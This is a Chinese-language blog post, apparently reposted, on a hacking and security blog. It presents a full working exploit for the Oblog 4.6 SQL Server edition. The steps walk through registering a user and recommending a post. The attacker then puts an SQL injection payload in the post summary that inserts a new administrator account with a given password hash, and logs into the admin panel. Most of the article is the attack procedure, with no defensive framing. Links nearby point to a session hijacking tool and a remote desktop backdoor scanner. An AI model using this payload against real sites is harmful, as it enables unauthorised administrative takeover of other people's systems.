病毒信息网 www.Virus-Info.asia

夜火 & 轨迹's Blog

免费网络资源-计算机技术-网络安全-Linux-Android—15897.com(要我发就齐) 夜火&轨迹共用的Blog

导航

Oblog4.6添加后台管理员漏洞(仅适用于sql版)

最近夜火我收集的软件安全工具等信息比较多,漏洞方面的很久没收集了,最重要的是技术有限。。。。看不懂的一些漏洞什么的,就直接pass掉了。

今天这个是Oblog4.6添加后台管理员漏洞,仅适用于sql版,有完整利用过程介绍

  1. 注册一个用户,用户名script,密码123456
  2. 发布一篇日志,日志标题:测试一下
  3. 个人前台首页找到日志"测试一下",点"推荐"
  4. 个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
  5. 最后点"确认提交"按钮,如果提示修改成功,注入完成!
  6. 登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!

转载请著明来源于0x54.com



« MaxHijack 1.4 - No Arp欺骗的会话劫持工具 3389的SHIFT后门自动扫描工具 »

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火&轨迹's Blog [ http://www.15897.com/ ]

本文链接地址: http://www.15897.com/blog/post/Oblog4.6-Add-admin-loopholes.html

收藏到网摘

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅本站

    订阅 夜火&轨迹's Blog - 可以即时阅读本blog的最新文章 订阅 夜火&轨迹's Blog

Search


最近发表

最新评论及回复

最近留言

图标汇集


  • 知识共享署名-非商业性使用-相同方式共享 2.5 中国大陆许可协议
  • RainbowSoft Studio Z-Blog   本站支持WAP访问
  • 订阅本站 RSS 2.0 新闻聚合

您可能需要这些?



网站分类

夜火的碎碎念

文章归档

ADs

    Powered By Z-Blog 1.8 Walle Build 91204

    Copyright © 夜火 & 轨迹's Blog All Rights Reserved.  苏ICP备09031555号   |   Sitemap   |